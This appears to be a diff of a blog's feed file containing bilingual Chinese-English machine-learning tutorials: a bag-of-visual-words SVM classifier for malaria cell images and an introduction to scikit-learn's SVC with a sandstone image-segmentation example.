    true_class =['Parasitized', 'Parasitized', 'Parasitized', 'Parasitized', 'Parasitized', 'Parasitized', 'Parasitized', 'Parasitized', 'Parasitized', 'Parasitized', 'Uninfected', 'Uninfected', 'Uninfected', 'Uninfected', 'Uninfected', 'Uninfected', 'Uninfected', 'Uninfected', 'Uninfected', 'Uninfected']prediction =['Parasitized', 'Parasitized', 'Uninfected', 'Parasitized', 'Uninfected', 'Parasitized', 'Uninfected', 'Uninfected', 'Parasitized', 'Uninfected', 'Parasitized', 'Uninfected', 'Uninfected', 'Uninfected', 'Uninfected', 'Uninfected', 'Uninfected', 'Uninfected', 'Uninfected', 'Uninfected']
    • To make it easy to understand the accuracy let us print the confusion matrix
    def showconfusionmatrix(cm):
    pl.matshow(cm)
    pl.title('Confusion matrix')
    pl.colorbar()
    pl.show()
    accuracy = accuracy_score(true_class, predictions)
    print ("accuracy = ", accuracy)
    cm = confusion_matrix(true_class, predictions)
    print (cm)
    accuracy =  0.7[[5 5] [1 9]]
    showconfusionmatrix(cm)


    png

    如果传统方法(SVM、K-Means、Random Forest)仍不能得到较好的准确性,需要考虑深度神经网络等技术。

    ]]>
    + 正文

    69 - Image classification using Bag of Visual Words -BOVW-

    Bag-of-words 模型入门

    它用于图像分类,而不是像素分割

    All cell images resized to 128 x 128
    Images used for test are completely different that the ones used for training.
    136 images for testing, each parasitized and uninfected (136 x 2)
    104 images for training, each parasitized and uninfected (104 x 2)
    Cannot import lots of data to Github, so uploaded 10 images of each.
    Download full dataset from: ftp://lhcftp.nlm.nih.gov/Open-Access-Datasets/Malaria/cell_images.zip
    这个链接好像打不开?找了个其他地址:https://www.kaggle.com/datasets/iarunava/cell-images-for-detecting-malaria?resource=download

    Train_BOVW

    1
    2
    3
    import cv2
    import numpy as np
    import os
    • Get the training classes names and store them in a list
    • Here we use folder names for class names
    1
    2
    train_path = 'images/cell_images/train'  # Folder Names are Parasitized and Uninfected
    training_names = os.listdir(train_path)
    • Get path to all images and save them in a list
    • image_paths and the corresponding label(对应标签)in image_paths
    1
    2
    3
    image_paths = []
    image_classes = []
    class_id = 0
    • To make it easy to list all file names in a directory let us define a function
    1
    2
    def imglist(path):    
    return [os.path.join(path, f) for f in os.listdir(path)]
    • Fill the placeholder empty lists with image path, classes, and add class ID number
      • 用 image path,classes 和 class ID number 填充 empty lists
    1
    2
    3
    4
    5
    6
    for training_name in training_names:
    dir = os.path.join(train_path, training_name)
    class_path = imglist(dir)
    image_paths += class_path
    image_classes += [class_id] * len(class_path)
    class_id += 1
    1
    image_paths
    ['images/cell_images/train\\Parasitized\\C37BP2_thinF_IMG_20150620_133111a_cell_87.png', 'images/cell_images/train\\Parasitized\\C37BP2_thinF_IMG_20150620_133111a_cell_88.png', 'images/cell_images/train\\Parasitized\\C37BP2_thinF_IMG_20150620_133205a_cell_87.png', 'images/cell_images/train\\Parasitized\\C37BP2_thinF_IMG_20150620_133205a_cell_88.png', 'images/cell_images/train\\Parasitized\\C37BP2_thinF_IMG_20150620_133238a_cell_97.png', 'images/cell_images/train\\Parasitized\\C38P3thinF_original_IMG_20150621_112043_cell_202.png', 'images/cell_images/train\\Parasitized\\C38P3thinF_original_IMG_20150621_112043_cell_203.png', 'images/cell_images/train\\Parasitized\\C38P3thinF_original_IMG_20150621_112116_cell_204.png', 'images/cell_images/train\\Parasitized\\C38P3thinF_original_IMG_20150621_112116_cell_205.png', 'images/cell_images/train\\Parasitized\\C38P3thinF_original_IMG_20150621_112138_cell_183.png', 'images/cell_images/train\\Uninfected\\C1_thinF_IMG_20150604_104919_cell_240.png', 'images/cell_images/train\\Uninfected\\C1_thinF_IMG_20150604_104942_cell_102.png', 'images/cell_images/train\\Uninfected\\C1_thinF_IMG_20150604_104942_cell_11.png', 'images/cell_images/train\\Uninfected\\C1_thinF_IMG_20150604_104942_cell_139.png', 'images/cell_images/train\\Uninfected\\C1_thinF_IMG_20150604_104942_cell_151.png', 'images/cell_images/train\\Uninfected\\C1_thinF_IMG_20150604_104942_cell_20.png', 'images/cell_images/train\\Uninfected\\C1_thinF_IMG_20150604_104942_cell_4.png', 'images/cell_images/train\\Uninfected\\C1_thinF_IMG_20150604_104942_cell_59.png', 'images/cell_images/train\\Uninfected\\C1_thinF_IMG_20150604_104942_cell_72.png', 'images/cell_images/train\\Uninfected\\C1_thinF_IMG_20150604_104942_cell_98.png']
    • 总共两类:Parasitized 寄生,Uninfected 未被感染
    1
    image_classes
    [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
    1
    class_id
    2
    • Create feature extraction and keypoint detector objects
      • 创建特征提取和关键点检测器对象
    • SIFT is not available anymore in openCV
      • SIFT 在 openCV 中不再可用
    • Create List where all the descriptors will be stored
      • 创建一个列表存储所有的描述符
    1
    des_list = []

    OpenCV 尺度不变特征检测:SIFT、SURF、BRISK、ORB

    • BRISK is a good replacement to SIFT. ORB also works but didn’t work well for this example
      • BRISK 是 SIFT 的良好替代品。ORB 也可以工作,但在本例中效果不佳
    1
    2
    3
    4
    5
    brisk = cv2.BRISK_create(30)
    for image_path in image_paths:
    im = cv2.imread(image_path)
    kpts, des = brisk.detectAndCompute(im, None)
    des_list.append((image_path, des))
    • Stack all the descriptors vertically in a numpy array
      • 在 numpy 数组中垂直堆叠所有描述符
    1
    2
    3
    4
    descriptors = des_list[0][1]
    for image_path, descriptor in des_list[1:]:
    descriptors = np.vstack((descriptors, descriptor))
    descriptors
    array([[244, 255, 223, ...,   0,  17,  48],       [254, 191, 247, ...,   8,  25,   0],       [240, 255, 255, ..., 137,  25,   0],       ...,       [128, 255, 255, ...,   0,   0,   0],       [176, 255, 255, ...,   0,   0,   0],       [240, 255, 255, ...,   0,   0,   0]], dtype=uint8)
    • kmeans works only on float, so convert integers to float
    1
    descriptors_float = descriptors.astype(float)
    • Perform k-means clustering and vector quantization
      • 执行 k 均值聚类和矢量量化

    这里使用 k-means,也可以使用 SVM 或 随机森林。

    1
    2
    3
    4
    from scipy.cluster.vq import kmeans, vq

    k = 200 # k means with 100 clusters gives lower accuracy for the aeroplane example
    voc, variance = kmeans(descriptors_float, k, 1)
    • Calculate the histogram of features and represent them as vector
      • 计算特征的直方图并将其表示为向量
    • vq Assigns codes from a code book to observations.
      • vq 将代码簿中的代码分配给观察值
    1
    2
    3
    4
    5
    im_features = np.zeros((len(image_paths), k), "float32")
    for i in range(len(image_paths)):
    words, distance = vq(des_list[i][1],voc)
    for w in words:
    im_features[i][w] += 1
    1
    words
    array([ 48,  14,  24,  50,  86, 177, 199,  91,  24,  15,  21,  44,  86,       192,  71,  46, 193,  59, 154,   2,  80, 119,  43])
    1
    distance
    array([ 79.62537284,  76.25693411, 150.61976132,   0.        ,       189.20699172, 167.46438427,   0.        , 132.3697473 ,        95.40341975, 137.6727198 , 113.90895487, 104.85068749,       104.80526159,   0.        , 170.24394262, 220.20785635,       118.6493433 ,  77.81910113,   0.        , 101.40636075,       217.89599966,  84.18283673, 133.43163043])
    • 执行 Tf-Idf 矢量化
    1
    2
    nbr_occurences = np.sum((im_features > 0) * 1, axis=0)
    idf = np.array(np.log((1.0 * len(image_paths) + 1) / (1.0 * nbr_occurences + 1)), 'float32')
    • Scaling the words standardize features by removing the mean and scaling to unit variance in a way normalization
      • 通过去除均值并以归一化的方式缩放到单位方差来缩放单词标准化特征
    1
    2
    3
    from sklearn.preprocessing import StandardScaler
    stdSlr = StandardScaler().fit(im_features)
    im_features = stdSlr.transform(im_features)
    • Train an algorithm to discriminate vectors corresponding to positive and negative training images
    • Train the Linear SVM
    1
    2
    3
    from sklearn.svm import LinearSVC
    clf = LinearSVC(max_iter=10000) # Default of 100 is not converging
    clf.fit(im_features, np.array(image_classes))
    • Save the SVM
    • Joblib dumps Python object into one file
      • Joblib 将 Python 对象转储到一个文件中
    1
    2
    import joblib
    joblib.dump((clf, training_names, stdSlr, k, voc), "bovw.pkl", compress=3)
    ['bovw.pkl']

    Validate_BOVW

    1
    2
    3
    4
    5
    6
    import cv2
    import numpy as np
    import os
    import pylab as pl
    from sklearn.metrics import confusion_matrix, accuracy_score # sreeni
    import joblib
    • Load the classifier, class names, scaler, number of clusters and vocabulary from stored pickle file (generated during training)
      • 从存储的 pickle 文件中加载分类器、类名、缩放器、聚类数和词汇表(在训练期间生成)
    1
    clf, classes_names, stdSlr, k, voc = joblib.load("bovw.pkl")
    • instead of test if you use train then we get great accuracy
      • 如果你用训练集来代替测试,我们会得到很高的准确性
    1
    2
    test_path = 'images/cell_images/test'
    testing_names = os.listdir(test_path)
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    # Get path to all images and save them in a list
    # image_paths and the corresponding label in image_paths
    image_paths = []
    image_classes = []
    class_id = 0

    # To make it easy to list all file names in a directory let us define a function

    def imglist(path):
    return [os.path.join(path, f) for f in os.listdir(path)]

    # Fill the placeholder empty lists with image path, classes, and add class ID number

    for testing_name in testing_names:
    dir = os.path.join(test_path, testing_name)
    class_path = imglist(dir)
    image_paths+=class_path
    image_classes+=[class_id]*len(class_path)
    class_id+=1

    # Create feature extraction and keypoint detector objects
    # SIFT is not available anymore in openCV
    # Create List where all the descriptors will be stored
    des_list = []

    # BRISK is a good replacement to SIFT. ORB also works but didn;t work well for this example
    brisk = cv2.BRISK_create(30)

    for image_path in image_paths:
    im = cv2.imread(image_path)
    kpts, des = brisk.detectAndCompute(im, None)
    des_list.append((image_path, des))

    # Stack all the descriptors vertically in a numpy array
    descriptors = des_list[0][1]
    for image_path, descriptor in des_list[0:]:
    descriptors = np.vstack((descriptors, descriptor))

    # Calculate the histogram of features
    # vq Assigns codes from a code book to observations.
    from scipy.cluster.vq import vq
    test_features = np.zeros((len(image_paths), k), "float32")
    for i in range(len(image_paths)):
    words, distance = vq(des_list[i][1],voc)
    for w in words:
    test_features[i][w] += 1

    # Perform Tf-Idf vectorization
    nbr_occurences = np.sum( (test_features > 0) * 1, axis = 0)
    idf = np.array(np.log((1.0*len(image_paths)+1) / (1.0*nbr_occurences + 1)), 'float32')

    # Scale the features
    # Standardize features by removing the mean and scaling to unit variance
    # Scaler (stdSlr comes from the pickled file we imported)
    test_features = stdSlr.transform(test_features)
    • Until here most of the above code is similar to Train excerpt for kmeans clustering

    • Report true class names so they can be compared with predicted classes
      • 报告真实的类别名称,以便与预测的类别进行比较
    1
    true_class = [classes_names[i] for i in image_classes]
    • Perform the predictions and report predicted class names.
      • 执行预测,并报告预测的类名。
    1
    predictions = [classes_names[i] for i in clf.predict(test_features)]
    • Print the true class and Predictions
    1
    2
    print ("true_class =" + str(true_class))
    print ("prediction =" + str(predictions))
    true_class =['Parasitized', 'Parasitized', 'Parasitized', 'Parasitized', 'Parasitized', 'Parasitized', 'Parasitized', 'Parasitized', 'Parasitized', 'Parasitized', 'Uninfected', 'Uninfected', 'Uninfected', 'Uninfected', 'Uninfected', 'Uninfected', 'Uninfected', 'Uninfected', 'Uninfected', 'Uninfected']prediction =['Parasitized', 'Parasitized', 'Uninfected', 'Parasitized', 'Uninfected', 'Parasitized', 'Uninfected', 'Uninfected', 'Parasitized', 'Uninfected', 'Parasitized', 'Uninfected', 'Uninfected', 'Uninfected', 'Uninfected', 'Uninfected', 'Uninfected', 'Uninfected', 'Uninfected', 'Uninfected']
    • To make it easy to understand the accuracy let us print the confusion matrix
    1
    2
    3
    4
    5
    def showconfusionmatrix(cm):
    pl.matshow(cm)
    pl.title('Confusion matrix')
    pl.colorbar()
    pl.show()
    1
    2
    3
    4
    accuracy = accuracy_score(true_class, predictions)
    print ("accuracy = ", accuracy)
    cm = confusion_matrix(true_class, predictions)
    print (cm)
    accuracy =  0.7[[5 5] [1 9]]
    1
    showconfusionmatrix(cm)


    png

    如果传统方法(SVM、K-Means、Random Forest)仍不能得到较好的准确性,需要考虑深度神经网络等技术。

    ]]>
    @@ -8768,7 +8768,7 @@ /posts/DIP-Python%20tutorials%20for%20image%20processing%20and%20machine%20learning(68)-SVM/ - 正文

    68 - Quick introduction to Support Vector Machines -SVM

    sklearn.svm.SVC — scikit-learn 1.2.0 documentation

    C-Support Vector Classification.

    • The implementation is based on libsvm. The fit time scales at least quadratically with the number of samples and may be impractical beyond tens of thousands of samples. For large datasets consider using LinearSVC or SGDClassifier instead, possibly after a Nystroem transformer.

      • 该实现基于 libsvm。拟合时间至少与样本数量成二次方比例,超过数万个样本可能不切实际。对于大型数据集,考虑使用 LinearSVC 或 SGDClassifier,可能在 Nystroem transformer 之后。
    • The multiclass support is handled according to a one-vs-one scheme.

      • 多类支持根据一对一方案进行处理。
    • For details on the precise mathematical formulation of the provided kernel functions and how gamma, coef0 and degree affect each other, see the corresponding section in the narrative documentation: Kernel functions.

      • 有关所提供内核函数的精确数学公式以及gammacoeff0degree如何相互影响的详细信息,请参阅叙事文档中的相应部分:内核函数。

    Read more in the User Guide.


    **Parameters 参数: **

    C: float, default=1.0

    • Regularization parameter. The strength of the regularization is inversely proportional to C. Must be strictly positive. The penalty is a squared l2 penalty.
      • 正则化参数。正则化的强度与C成反比。必须严格为正。惩罚是l2的平方惩罚。

    kernel: {‘linear’, ‘poly’, ‘rbf’, ‘sigmoid’, ‘precomputed’} or callable, default=’rbf’

    • Specifies the kernel type to be used in the algorithm. If none is given, ‘rbf’ will be used. If a callable is given it is used to pre-compute the kernel matrix from data matrices; that matrix should be an array of shape (n_samples, n_samples).
      • 指定要在算法中使用的内核类型。如果没有给出,将使用“rbf”。如果给定了一个可调用函数,则它用于从数据矩阵中预计算内核矩阵;该矩阵应该是形状“(n_samples,n_samples)”的数组。

    degree: int, default=3

    • Degree of the polynomial kernel function (‘poly’). Must be non-negative. Ignored by all other kernels.
      • 多项式核函数的次数(‘poly’)。必须为非负。被所有其他内核忽略。(只在内核类型为 poly 时有效)

    gamma:{‘scale’, ‘auto’} or float, default=’scale’*

    • Kernel coefficient for ‘rbf’, ‘poly’ and ‘sigmoid’.

      • “rbf”、“poly”和“sigmoid”的核系数。
    • if gamma='scale' (default) is passed then it uses 1 / (n_features * X.var()) as value of gamma,

    • if ‘auto’, uses 1 / n_features

    • if float, must be non-negative.

    Changed in version 0.22: The default value of gamma changed from ‘auto’ to ‘scale’.

    coef0: float, default=0.0

    • Independent term in kernel function. It is only significant in ‘poly’ and ‘sigmoid’.
      • 核函数中的独立项。它只在“poly”和“sigmoid”中有意义。

    shrinking: bool, default=True

    • Whether to use the shrinking heuristic. See the User Guide.
      • 是否使用收缩启发式。

    probability: bool, default=False

    • Whether to enable probability estimates. This must be enabled prior to calling fit, will slow down that method as it internally uses 5-fold cross-validation, and predict_proba may be inconsistent with predict. Read more in the User Guide.
      • 是否启用概率估计。这必须在调用“fit”之前启用,这会减慢该方法的速度,因为它内部使用5倍交叉验证,而且“predict_proba”可能与“predict”不一致。

    tol: float, default=1e-3

    • Tolerance for stopping criterion.
      • 停止标准公差。

    cache_size: float, default=200

    • Specify the size of the kernel cache (in MB).
      • 指定内核缓存的大小(以MB为单位)。

    class_weight: dict or ‘balanced’, default=None

    • Set the parameter C of class i to class_weight[i]*C for SVC. If not given, all classes are supposed to have weight one. The “balanced” mode uses the values of y to automatically adjust weights inversely proportional to class frequencies in the input data as n_samples / (n_classes * np.bincount(y)).
      • 对于SVC,将类i的参数C设置为class_weight[i]*C。如果没有给出,所有的课程都应该有一个权重。“平衡”模式使用y值自动调整与输入数据中的类频率成反比的权重,如n_samples/(n_classes*np.bincount(y))

    verbose: bool, default=False

    • Enable verbose output. Note that this setting takes advantage of a per-process runtime setting in libsvm that, if enabled, may not work properly in a multithreaded context.
      • 启用详细输出。注意,此设置利用了libsvm中的每进程运行时设置,如果启用该设置,则在多线程上下文中可能无法正常工作。

    max_iter: int, default=-1

    • Hard limit on iterations within solver, or -1 for no limit.
      • 解算器内迭代的硬限制,或-1表示无限制。

    decision_function_shape: {‘ovo’, ‘ovr’}, default=’ovr’

    Whether to return a one-vs-rest (‘ovr’) decision function of shape (n_samples, n_classes) as all other classifiers, or the original one-vs-one (‘ovo’) decision function of libsvm which has shape (n_samples, n_classes * (n_classes - 1) / 2). However, note that internally, one-vs-one (‘ovo’) is always used as a multi-class strategy to train models; an ovr matrix is only constructed from the ovo matrix. The parameter is ignored for binary classification.

    Changed in version 0.19: decision_function_shape is ‘ovr’ by default.

    New in version 0.17: decision_function_shape=’ovr’ is recommended.

    Changed in version 0.17: Deprecated decision_function_shape=’ovo’ and None.

    break_ties: bool, default=False

    If true, decision_function_shape='ovr', and number of classes > 2, predict will break ties according to the confidence values of decision_function; otherwise the first class among the tied classes is returned. Please note that breaking ties comes at a relatively high computational cost compared to a simple predict.

    New in version 0.22.

    random_state: int, RandomState instance or None, default=None

    • Controls the pseudo random number generation for shuffling the data for probability estimates. Ignored when probability is False. Pass an int for reproducible output across multiple function calls. See Glossary.
      • 控制伪随机数的生成,以便对概率估计的数据进行混洗。当“probability”为False时忽略。在多个函数调用之间传递一个int以获得可复制的输出。

    **Attributes 属性: **

    class_weight_: ndarray of shape (n_classes,)

    • Multipliers of parameter C for each class. Computed based on the class_weight parameter.
      • 每个类的参数 C 的乘数。基于 class_weight 参数计算。

    classes_: ndarray of shape (n_classes,)
    The classes labels.

    coef_: ndarray of shape (n_classes * (n_classes - 1) / 2, n_features)

    • Weights assigned to the features when kernel=“linear”.
      • 当 kernel=“linear”时,分配给特征的权重。

    dual_coef_: ndarray of shape (n_classes -1, n_SV)

    • Dual coefficients of the support vector in the decision function (see Mathematical formulation), multiplied by their targets. For multiclass, coefficient for all 1-vs-1 classifiers. The layout of the coefficients in the multiclass case is somewhat non-trivial. See the multi-class section of the User Guide for details.
      • 决策函数中支持向量的对偶系数(参见数学公式)乘以其目标。对于多类别,所有 1-vs-1 分类器的系数。在多类情况下,系数的布局有些不平凡。有关详细信息,请参阅《用户指南》的多类部分。

    fit_status_: int

    • 0 if correctly fitted, 1 otherwise (will raise warning)
      • 如果安装正确,则为 0,否则为 1(将发出警告)

    intercept_: ndarray of shape (n_classes * (n_classes - 1) / 2,)

    • Constants in decision function.
      • 决策函数中的常量。

    n_features_in_: int

    • Number of features seen during fit.
      • 装配过程中看到的特征数量。

    New in version 0.24.

    feature_names_in_: ndarray of shape (n_features_in_,)

    • Names of features seen during fit. Defined only when X has feature names that are all strings.
      • 装配过程中看到的特征名称。仅当 X 具有全部字符串的要素名称时才定义。

    New in version 1.0.

    n_iter_: ndarray of shape (n_classes * (n_classes - 1) // 2,)

    • Number of iterations run by the optimization routine to fit the model. The shape of this attribute depends on the number of models optimized which in turn depends on the number of classes.
      • 优化例程为拟合模型而运行的迭代次数。该属性的形状取决于优化的模型数量,而优化的模型又取决于类的数量。

    New in version 1.1.

    support_: ndarray of shape (n_SV)

    • Indices of support vectors.
      • 支持向量索引。

    support_vectors_: ndarray of shape (n_SV, n_features)
    Support vectors.

    n_support_: ndarray of shape (n_classes,), dtype=int32
    Number of support vectors for each class.

    probA_: ndarray of shape (n_classes * (n_classes - 1) / 2)
    Parameter learned in Platt scaling when probability=True.

    • 当概率为 True 时,在 Platt 缩放中学习的参数。

    probB_: ndarray of shape (n_classes * (n_classes - 1) / 2)
    Parameter learned in Platt scaling when probability=True.

    shape_fit_: tuple of int of shape (n_dimensions_of_X,)
    Array dimensions of training vector X.

    68b - SVM vs. Random Forest for image segmentation

    import numpy as np
    import cv2
    import pandas as pd

    img = cv2.imread('images/Train_images/Sandstone_Versa0000.tif')
    img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
    img2 = img.reshape(-1)
    df = pd.DataFrame()
    df['Original Image'] = img2

    # Generate Gabor features
    num = 1
    kernels = []
    for theta in range(2):
    theta = theta / 4. * np.pi
    for sigma in (1, 3):
    for lamda in np.arange(0, np.pi, np.pi / 4):
    for gamma in (0.05, 0.5):
    gabor_label = 'Gabor' + str(num)
    ksize=9
    kernel = cv2.getGaborKernel((ksize, ksize), sigma, theta, lamda, gamma, 0, ktype=cv2.CV_32F)
    kernels.append(kernel)
    fimg = cv2.filter2D(img2, cv2.CV_8UC3, kernel)
    filtered_img = fimg.reshape(-1)
    df[gabor_label] = filtered_img
    num += 1
    # CANNY EDGE
    edges = cv2.Canny(img, 100,200)
    edges1 = edges.reshape(-1)
    df['Canny Edge'] = edges1

    from skimage.filters import roberts, sobel, scharr, prewitt

    # ROBERTS EDGE
    edge_roberts = roberts(img)
    edge_roberts1 = edge_roberts.reshape(-1)
    df['Roberts'] = edge_roberts1

    # SOBEL
    edge_sobel = sobel(img)
    edge_sobel1 = edge_sobel.reshape(-1)
    df['Sobel'] = edge_sobel1

    # SCHARR
    edge_scharr = scharr(img)
    edge_scharr1 = edge_scharr.reshape(-1)
    df['Scharr'] = edge_scharr1

    # PREWITT
    edge_prewitt = prewitt(img)
    edge_prewitt1 = edge_prewitt.reshape(-1)
    df['Prewitt'] = edge_prewitt1

    # GAUSSIAN with sigma=3
    from scipy import ndimage as nd

    gaussian_img = nd.gaussian_filter(img, sigma=3)
    gaussian_img1 = gaussian_img.reshape(-1)
    df['Gaussian s3'] = gaussian_img1

    # GAUSSIAN with sigma=7
    gaussian_img2 = nd.gaussian_filter(img, sigma=7)
    gaussian_img3 = gaussian_img2.reshape(-1)
    df['Gaussian s7'] = gaussian_img3

    # MEDIAN with sigma=3
    median_img = nd.median_filter(img, size=3)
    median_img1 = median_img.reshape(-1)
    df['Median s3'] = median_img1

    # VARIANCE with size=3
    variance_img = nd.generic_filter(img, np.var, size=3)
    variance_img1 = variance_img.reshape(-1)
    df['Variance s3'] = variance_img1

    ######################################

    # Now, add a column in the data frame for the Labels
    # For this, we need to import the labeled image
    labeled_img = cv2.imread('images/Train_masks/Sandstone_Versa0000.tif')
    # Remember that you can load an image with partial labels
    # But, drop the rows with unlabeled data

    labeled_img = cv2.cvtColor(labeled_img, cv2.COLOR_BGR2GRAY)
    labeled_img1 = labeled_img.reshape(-1)
    df['Labels'] = labeled_img1

    #########################################################

    # Define the dependent variable that needs to be predicted (labels)
    Y = df["Labels"].values

    # Define the independent variables
    X = df.drop(labels = ["Labels"], axis=1)

    # Split data into train and test to verify accuracy after fitting the model.
    from sklearn.model_selection import train_test_split
    X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.4, random_state=20)
    from sklearn.svm import LinearSVC

    model = LinearSVC(max_iter=100)
    model.fit(X_train, Y_train)
    prediction_test = model.predict(X_test)
    C:\Users\gzjzx\anaconda3\lib\site-packages\sklearn\svm\_base.py:1225: ConvergenceWarning: Liblinear failed to converge, increase the number of iterations.  warnings.warn(

    SVM 的速度要比 随机森林 慢得多

    from sklearn import metrics

    print("Accuracy=", metrics.accuracy_score(Y_test, prediction_test))
    Accuracy= 0.9525666606203519
    # You can store the model for future use. In fact, this is how you do machine elarning
    # Train on training images, validate on test images and deploy the model on unknown images.
    # 储存训练模型

    import pickle

    # Save the trained model as pickle string to disk for future use
    filename = "sandstone_model"
    pickle.dump(model, open(filename, 'wb'))

    # To test the model on future datasets
    loaded_model = pickle.load(open(filename, 'rb'))
    result = loaded_model.predict(X)

    # 将分割结果以图片显示
    segmented = result.reshape((img.shape))

    from matplotlib import pyplot as plt

    plt.imshow(segmented, cmap ='jet')
    plt.imsave('segmented_rock_RF_100_estim.jpg', segmented, cmap ='jet')

    png

    虽然这并不意味着支持向量机没用,但我的意思是,对于像素分割,支持向量机可能不是正确的选择,但是如果你有图像分类,支持向量机实际上做得很好。

    ]]>
    + 正文

    68 - Quick introduction to Support Vector Machines -SVM

    sklearn.svm.SVC — scikit-learn 1.2.0 documentation

    C-Support Vector Classification.

    • The implementation is based on libsvm. The fit time scales at least quadratically with the number of samples and may be impractical beyond tens of thousands of samples. For large datasets consider using LinearSVC or SGDClassifier instead, possibly after a Nystroem transformer.

      • 该实现基于 libsvm。拟合时间至少与样本数量成二次方比例,超过数万个样本可能不切实际。对于大型数据集,考虑使用 LinearSVC 或 SGDClassifier,可能在 Nystroem transformer 之后。
    • The multiclass support is handled according to a one-vs-one scheme.

      • 多类支持根据一对一方案进行处理。
    • For details on the precise mathematical formulation of the provided kernel functions and how gamma, coef0 and degree affect each other, see the corresponding section in the narrative documentation: Kernel functions.

      • 有关所提供内核函数的精确数学公式以及gammacoeff0degree如何相互影响的详细信息,请参阅叙事文档中的相应部分:内核函数。

    Read more in the User Guide.


    **Parameters 参数: **

    C: float, default=1.0

    • Regularization parameter. The strength of the regularization is inversely proportional to C. Must be strictly positive. The penalty is a squared l2 penalty.
      • 正则化参数。正则化的强度与C成反比。必须严格为正。惩罚是l2的平方惩罚。

    kernel: {‘linear’, ‘poly’, ‘rbf’, ‘sigmoid’, ‘precomputed’} or callable, default=’rbf’

    • Specifies the kernel type to be used in the algorithm. If none is given, ‘rbf’ will be used. If a callable is given it is used to pre-compute the kernel matrix from data matrices; that matrix should be an array of shape (n_samples, n_samples).
      • 指定要在算法中使用的内核类型。如果没有给出,将使用“rbf”。如果给定了一个可调用函数,则它用于从数据矩阵中预计算内核矩阵;该矩阵应该是形状“(n_samples,n_samples)”的数组。

    degree: int, default=3

    • Degree of the polynomial kernel function (‘poly’). Must be non-negative. Ignored by all other kernels.
      • 多项式核函数的次数(‘poly’)。必须为非负。被所有其他内核忽略。(只在内核类型为 poly 时有效)

    gamma:{‘scale’, ‘auto’} or float, default=’scale’*

    • Kernel coefficient for ‘rbf’, ‘poly’ and ‘sigmoid’.

      • “rbf”、“poly”和“sigmoid”的核系数。
    • if gamma='scale' (default) is passed then it uses 1 / (n_features * X.var()) as value of gamma,

    • if ‘auto’, uses 1 / n_features

    • if float, must be non-negative.

    Changed in version 0.22: The default value of gamma changed from ‘auto’ to ‘scale’.

    coef0: float, default=0.0

    • Independent term in kernel function. It is only significant in ‘poly’ and ‘sigmoid’.
      • 核函数中的独立项。它只在“poly”和“sigmoid”中有意义。

    shrinking: bool, default=True

    • Whether to use the shrinking heuristic. See the User Guide.
      • 是否使用收缩启发式。

    probability: bool, default=False

    • Whether to enable probability estimates. This must be enabled prior to calling fit, will slow down that method as it internally uses 5-fold cross-validation, and predict_proba may be inconsistent with predict. Read more in the User Guide.
      • 是否启用概率估计。这必须在调用“fit”之前启用,这会减慢该方法的速度,因为它内部使用5倍交叉验证,而且“predict_proba”可能与“predict”不一致。

    tol: float, default=1e-3

    • Tolerance for stopping criterion.
      • 停止标准公差。

    cache_size: float, default=200

    • Specify the size of the kernel cache (in MB).
      • 指定内核缓存的大小(以MB为单位)。

    class_weight: dict or ‘balanced’, default=None

    • Set the parameter C of class i to class_weight[i]*C for SVC. If not given, all classes are supposed to have weight one. The “balanced” mode uses the values of y to automatically adjust weights inversely proportional to class frequencies in the input data as n_samples / (n_classes * np.bincount(y)).
      • 对于SVC,将类i的参数C设置为class_weight[i]*C。如果没有给出,所有的课程都应该有一个权重。“平衡”模式使用y值自动调整与输入数据中的类频率成反比的权重,如n_samples/(n_classes*np.bincount(y))

    verbose: bool, default=False

    • Enable verbose output. Note that this setting takes advantage of a per-process runtime setting in libsvm that, if enabled, may not work properly in a multithreaded context.
      • 启用详细输出。注意,此设置利用了libsvm中的每进程运行时设置,如果启用该设置,则在多线程上下文中可能无法正常工作。

    max_iter: int, default=-1

    • Hard limit on iterations within solver, or -1 for no limit.
      • 解算器内迭代的硬限制,或-1表示无限制。

    decision_function_shape: {‘ovo’, ‘ovr’}, default=’ovr’

    Whether to return a one-vs-rest (‘ovr’) decision function of shape (n_samples, n_classes) as all other classifiers, or the original one-vs-one (‘ovo’) decision function of libsvm which has shape (n_samples, n_classes * (n_classes - 1) / 2). However, note that internally, one-vs-one (‘ovo’) is always used as a multi-class strategy to train models; an ovr matrix is only constructed from the ovo matrix. The parameter is ignored for binary classification.

    Changed in version 0.19: decision_function_shape is ‘ovr’ by default.

    New in version 0.17: decision_function_shape=’ovr’ is recommended.

    Changed in version 0.17: Deprecated decision_function_shape=’ovo’ and None.

    break_ties: bool, default=False

    If true, decision_function_shape='ovr', and number of classes > 2, predict will break ties according to the confidence values of decision_function; otherwise the first class among the tied classes is returned. Please note that breaking ties comes at a relatively high computational cost compared to a simple predict.

    New in version 0.22.

    random_state: int, RandomState instance or None, default=None

    • Controls the pseudo random number generation for shuffling the data for probability estimates. Ignored when probability is False. Pass an int for reproducible output across multiple function calls. See Glossary.
      • 控制伪随机数的生成,以便对概率估计的数据进行混洗。当“probability”为False时忽略。在多个函数调用之间传递一个int以获得可复制的输出。

    **Attributes 属性: **

    class_weight_: ndarray of shape (n_classes,)

    • Multipliers of parameter C for each class. Computed based on the class_weight parameter.
      • 每个类的参数 C 的乘数。基于 class_weight 参数计算。

    classes_: ndarray of shape (n_classes,)
    The classes labels.

    coef_: ndarray of shape (n_classes * (n_classes - 1) / 2, n_features)

    • Weights assigned to the features when kernel=“linear”.
      • 当 kernel=“linear”时,分配给特征的权重。

    dual_coef_: ndarray of shape (n_classes -1, n_SV)

    • Dual coefficients of the support vector in the decision function (see Mathematical formulation), multiplied by their targets. For multiclass, coefficient for all 1-vs-1 classifiers. The layout of the coefficients in the multiclass case is somewhat non-trivial. See the multi-class section of the User Guide for details.
      • 决策函数中支持向量的对偶系数(参见数学公式)乘以其目标。对于多类别,所有 1-vs-1 分类器的系数。在多类情况下,系数的布局有些不平凡。有关详细信息,请参阅《用户指南》的多类部分。

    fit_status_: int

    • 0 if correctly fitted, 1 otherwise (will raise warning)
      • 如果安装正确,则为 0,否则为 1(将发出警告)

